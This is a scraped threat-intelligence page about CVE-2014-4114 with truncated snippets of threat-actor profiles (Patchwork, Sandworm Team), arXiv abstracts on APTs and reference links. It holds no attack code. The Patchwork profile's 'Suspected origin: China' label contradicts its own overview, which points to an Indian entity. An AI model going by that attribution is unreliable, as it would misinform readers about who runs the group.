Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Threat Intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
threat_intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
# Threat Actor Profile: Patchwork
ATT&CK ID: G0040
Also known as: Patchwork, Hangover Group, Dropping Elephant, Chinastrats, MONSOON, Operation Hangover
Suspected origin: China
## Overview
Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Cita
Threat Intel
Sandworm Team (Sandworm Team, ELECTRUM, Telebots)
threat_intel
Sandworm Team (Sandworm Team, ELECTRUM, Telebots)
# Threat Actor Profile: Sandworm Team
ATT&CK ID: G0034
Also known as: Sandworm Team, ELECTRUM, Telebots, IRON VIKING, BlackEnergy (Group), Quedagh, Voodoo Bear, IRIDIUM, Seashell Blizzard, FROZENBARENTS, APT44
Suspected origin: Russia
## Overview
Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)
In October 2020, the US indicted six GRU Unit 74455 of
arXiv
Techniques of Modern Attacks
arxiv_fulltext·2026-01-19
Techniques of Modern Attacks
## Abstract
The techniques used in modern attacks have become an important factor for investigation. As
we advance further into the digital age, cyber attackers are employing increasingly sophisticated and highly threatening methods. These attacks target not only organizations and governments but also extend to private and corporate sectors. Modern attack techniques, such as lateral movement and ransomware, are designed to infiltrate networks and steal sensitive data. Among these techniques, Advanced Persistent Threats (APTs) represent a complex method of attack aimed at specific targets to steal high-value sensitive information or damage the infrastructure of the targeted organization.
In this paper, I will investigate Advanced Persistent Threats (APTs) as a modern attack
technique, focu
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
plain
plain
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
Detecting Anomalies using Overlapping Electrical Measurements in Smart Power Grids
arxiv_fulltext·2022-01-06
Detecting Anomalies using Overlapping Electrical Measurements in Smart Power Grids
Detecting Anomalies using Overlapping Electrical Measurements in Smart Power Grids
Sina Sontowski
Dept. of Computer Science
Tennessee Technological University
Cookeville, TN
Email: [email protected]
Nigel Lawrence, Deepjyoti Deka
Los Alamos National Laboratory
Los Alamos, NM
Email: [email protected]
Sina Sontowski1, Nigel Lawrence2, Deepjyoti Deka3, and Maanak Gupta4
14Dept. of Computer Science,
Tennessee Technological University,
Cookeville, Tennessee, USA
23Los Alamos National Laboratory, Los Alamos, New Mexico, USA
[email protected],
[email protected],
[email protected],
[email protected]
## Abstract
As cyber-attacks against critical infrastructure become more frequent, it is increasingly important to be able to rapidly identify and respond to these threats.
arXiv
Technical Aspects of Cyber Kill Chain
arxiv_fulltext·2016-06-10
Technical Aspects of Cyber Kill Chain
Technical Aspects of Cyber Kill Chain
Tarun Yadav
Scientist, Defence Research and\ Organisation, INDIA\ : [email protected]
Rao Arvind Mallari
Scientist, Defence Research and\ Organisation, INDIA\ :[email protected]
## Abstract
Recent trends in targeted cyber-attacks has increased the interest of research in the field of cyber security. Such attacks have massive disruptive effects on organizations, enterprises and governments. Cyber kill chain is a model to describe cyber-attacks so as to develop incident response and analysis capabilities. Cyber kill chain in simple terms is an attack chain, the path that an intruder takes to penetrate information systems over time to execute an attack on the target. This paper broadly categories the methodologies, techniques and tools involv
http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/http://blogs.technet.com/b/srd/archive/2014/10/14/accessing-risk-for-the-october-2014-security-updates.aspxhttp://osvdb.org/show/osvdb/113140http://secunia.com/advisories/60972http://www.exploit-db.com/exploits/35019http://www.exploit-db.com/exploits/35020http://www.exploit-db.com/exploits/35055http://www.isightpartners.com/2014/10/cve-2014-4114/http://www.securityfocus.com/bid/70419https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-060http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/http://blogs.technet.com/b/srd/archive/2014/10/14/accessing-risk-for-the-october-2014-security-updates.aspxhttp://osvdb.org/show/osvdb/113140http://secunia.com/advisories/60972http://www.exploit-db.com/exploits/35019http://www.exploit-db.com/exploits/35020http://www.exploit-db.com/exploits/35055http://www.isightpartners.com/2014/10/cve-2014-4114/http://www.securityfocus.com/bid/70419https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-060https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-4114
2014-10-15
Published
2022-03-03
Added to CISA KEV
Exploited in the wild